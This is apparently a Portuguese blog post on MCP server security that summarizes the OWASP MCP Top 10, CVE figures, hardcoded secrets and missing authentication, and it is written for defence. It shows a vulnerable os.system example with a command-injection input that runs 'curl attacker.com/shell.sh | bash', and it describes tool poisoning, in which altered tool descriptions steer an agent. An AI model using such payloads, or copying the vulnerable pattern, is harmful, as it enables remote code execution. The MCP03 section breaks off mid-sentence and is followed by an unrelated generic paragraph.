38% dos servidores MCP não possuem autenticação - dentro do OWASP MCP Top 10
Instalei 14 servidores MCP no mês passado. Depois li a lista de CVEs.
Estou executando servidores MCP em produção desde o final de 2025 -- conectando Claude às minhas ferramentas de contabilidade, rastreadores de projetos e bancos de dados internos. Apenas no mês passado, adicionei 14 novos servidores MCP à minha configuração. Operações de arquivo, busca de código, integração com Slack, tudo.
Então a OWASP publicou o MCP Top 10, e passei um fim de semana lendo relatórios de CVE em vez de lançar recursos.
30 CVEs registrados contra implementações MCP em 60 dias. 38% dos servidores em uma varredura de 500+ servidores não tinham autenticação. Uma vulnerabilidade de STDIO (CVE-2026-30623) que permite execução remota de código em todos os SDKs oficiais do MCP -- Python, TypeScript, Java, Rust. Todos eles.
A resposta da Anthropic para essa última? "Comportamento esperado." A sanitização é responsabilidade do desenvolvedor.
Revisei meus 14 servidores. Três tinham chaves de API codificadas. Um estava exposto à internet sem autenticação. Eu o configurei para "teste rápido" há dois meses e esqueci dele.
Isso não é um modelo de ameaça teórica. É terça-feira.
Os números
Aqui está a situação da segurança do MCP em abril de 2026:
| Métrica | Número | Fonte |
|---|---|---|
| CVEs registrados em 60 dias | 30+ | Adversa AI, março de 2026 |
| Servidores sem autenticação | 38% | varredura de 500+ servidores |
| CVEs de maior severidade | CVSS 9.6 | CVE-2025-6514 |
| Instâncias vulneráveis (STDIO RCE) | 200K+ | Em mais de 7.000 servidores públicos |
| Total de downloads afetados | 150M+ | Todas as linguagens de SDK oficiais |
| Amplificação de token de ataque DoW | 142.4x | artigo de pesquisa arXiv |
Entre 2.614 implementações de MCP pesquisadas por pesquisadores de segurança, 82% usam operações de arquivo vulneráveis a travessia de caminho.
Por que a superfície de ataque do MCP é diferente das APIs regulares
Uma chamada de API REST normal é uma rua de mão única: você envia uma solicitação, recebe uma resposta. O MCP é uma rodovia de quatro faixas sem medianas.
Quatro coisas tornam a superfície de ataque do MCP muito mais ampla do que uma API padrão:
- Comunicação bidirecional -- Servidores MCP podem consultar o LLM de volta (Amostragem). A ferramenta que você está chamando pode fazer perguntas à sua IA.
- Sessões de múltiplas ferramentas -- Uma conversa usa vários servidores MCP simultaneamente. Uma API de clima comprometida pode acessar seu servidor de banco de dados através de um contexto compartilhado.
- Controle por linguagem natural -- Descrições de ferramentas direcionam diretamente o comportamento do LLM. Mude a descrição, mude as ações do agente.
- Acesso de alta privilégio -- Sistemas de arquivos, bancos de dados, APIs externas, todos acessíveis a partir de uma única sessão.
A equipe de pesquisa da Microsoft chama isso de "cenário das chaves do reino". Um servidor MCP comprometido pode dar aos atacantes acesso a tudo que está conectado à mesma sessão.
O OWASP MCP Top 10: o que realmente importa
A OWASP publicou dez categorias. Vou agrupá-las pelo que me mantém acordado à noite.
Aqueles que vão te morder primeiro
MCP01: Má gestão de tokens e vazamentos de segredos -- Credenciais codificadas nas configurações do servidor MCP. Esta é a vulnerabilidade mais comum porque é a mais chata. Ninguém pensa que vai enviar uma chave de API para o GitHub até que o faça.
// Encontrado isso na minha própria configuração.
{
"env": {
"API_CLIENT_SECRET": "sk-proj-abc123..."
}
}
A correção não é empolgante: variáveis de ambiente, gerenciadores de segredos, tokens de curta duração com rotação de atualização, e git-secrets ou gitleaks em seus hooks de pré-commit.
MCP07: Autenticação e autorização insuficientes -- A estatística de 38%. Mais de um terço dos servidores MCP não têm autenticação alguma. OAuth 2.1 e mTLS existem. Use-os.
MCP05: Injeção de Comando -- CVE-2026-30623 se enquadra aqui. A camada de transporte STDIO nos SDKs oficiais do MCP não sanitiza as entradas, o que significa que uma chamada de ferramenta cuidadosamente elaborada pode executar comandos de sistema arbitrários.
# Padrão vulnerável (comum em implementações de servidores MCP)
def convert_image(filepath, format):
os.system(f"convert {filepath} output.{format}")
# Entrada de ataque: filepath = "image.jpg; curl attacker.com/shell.sh | bash"
Use subprocess.run(shell=False). Valide cada entrada. Execute servidores MCP em sandboxes.
Aqueles que são mais difíceis de detectar
MCP03: Envenenamento de Ferramentas -- Um atacante incorpora instruções ocultas
A segurança dos servidores MCP é crucial para empresas que utilizam IA em suas operações. A falta de autenticação pode expor dados sensíveis e comprometer sistemas. Implementar práticas recomendadas de segurança é essencial para proteger a integridade dos negócios.
